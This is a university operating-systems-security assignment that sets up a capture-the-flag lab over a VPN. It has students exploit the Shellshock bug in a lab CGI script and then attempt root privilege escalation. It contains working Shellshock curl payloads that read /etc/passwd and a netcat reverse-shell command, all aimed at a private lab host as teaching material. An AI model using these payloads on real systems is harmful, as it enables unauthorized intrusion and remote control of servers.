**Operating Systems Security – Assignment 6** 

Version 1.0.0 - 2014/2015

Institute for Computing and Information Sciences, Radboud University Nijmegen, The Netherlands.

# 1 Capture The Flag (CTF)

In computer security, Capture the Flag (CTF) is a computer security competition. CTF contests are usually designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. Reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which are heavily utilized during a CTF challenge<sup>1</sup>.

### Prerequisites 1

Set-up a Virtual Private Network (VPN) in your (Kali) Linux system and connect with the targets (local) network. Login to BlackBoard and retrieve the login credentials to access the VPN network.

- To configure VPN in your (Kali) Linux system, make sure you use a "bridged" network interface in VMware (or VirtualBox). This means that your virtual machine should get a similar IP address as your main computer (both get a lease from the DHCP server in your (local) network). To see the IP address of your (Kali) Linux system use the following command: \$ sudo /sbin/ifconfig
   Open a terminal in your (Kali) Linux system, install pptpsetup and configure the VPN
  - \$ sudo apt-get install pptp-linux \$ sudo /usr/sbin/pptpsetup --create ossvpn --server hackme.cs.ru.nl --username oss --password [see blackboard] --encrypt C
- 3. Connect with the VPN server
  - \$ sudo pon ossvpn
- 4. Verify that you got an IP address assigned in the range of 192.168.62.\*.\$ sudo /sbin/ifconfig

```
...
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.62.100 P-t-P:192.168.62.1 Mask:255.255.255.255
...
```

The assigned IP address in the this example output is 192.168.62.100.

- 5. Enable routing of packets within the same 192.168.62.\* subnet
- \$ sudo ip route add 192.168.62.0/24 dev ppp0
- 6. Finally, test if you can reach the target system

\$ ping 192.168.62.2

PING 192.168.62.2 (192.168.62.2) 56(84) bytes of data. 64 bytes from 192.168.62.2: icmp\_req=1 ttl=63 time=21.6 ms 64 bytes from 192.168.62.2: icmp\_req=2 ttl=63 time=23.3 ms 64 bytes from 192.168.62.2: icmp\_req=3 ttl=63 time=20.4 ms ...

 $<sup>^1</sup>$  http://en.wikipedia.org/wiki/Capture\_the\_flag#Computer\_security

#### Prerequisites 2

- 1. Make yourself familiar with the **Shellshock** software bug<sup>2</sup>.
- 2. Open a browser and navigate to http://192.168.62.2/, verify if it works and notice the website redirects directly to http://192.168.62.2/cgi-bin/index.sh. Execute in the (Kali) Linux terminal the following command to configure the HDR and URL environment variables. \$ export HDR="echo 'Content-type: text/plain'; echo;" \$ export URL="http://192.168.62.2/cgi-bin/index.sh"
- 3. Use the Shellshock vulnerability and execute the following commands remotely.
  Print the operating system name:
   \$ curl -A "() { :; }; \$HDR /bin/uname -a" \$URL
  Print the /etc/passwd file:
   \$ curl -A "() { :; }; \$HDR /bin/cat /etc/passwd" \$URL

```
Show the network configuration:
    $ curl -A "() { :; }; $HDR /sbin/ifconfig" $URL
```

## Objectives

a) Use the **netcat** utility to spawn a remote shell. Open in (Kali) Linux two shells and execute in the first one:

```
$ nc -v -v -l -p 4444
And in the second shell you exploit the Shellshock vulnerability:
$ curl -A "() { :; }; $HDR /bin/nc 192.168.62.100 4444 -e /bin/bash" $URL
Note, you should replace 192.168.62.100 with your 192.168.62.* IP address
Return to your first shell and explain what happens. Figure out what you have triggered and
what rights you gained by doing this.
```

- b) Try to gain root privileges without destroying the box (target system). Find a way to use Metasploit for this or find a Proof of Concept (PoC) exploit to attack the box. Examples of local privilege escalation (local root) exploits are not so difficult to find<sup>3</sup>
- c) Explain in detail what you downloaded, compiled and executed to gain root privileges.

## 2 Information leakage

Write a (small) c program that prints its own source-code.

<sup>&</sup>lt;sup>2</sup> http://en.wikipedia.org/wiki/Shellshock\_(software\_bug)

<sup>&</sup>lt;sup>3</sup> http://www.exploit-db.com/search/?action=search&filter\_platform=16&filter\_type=2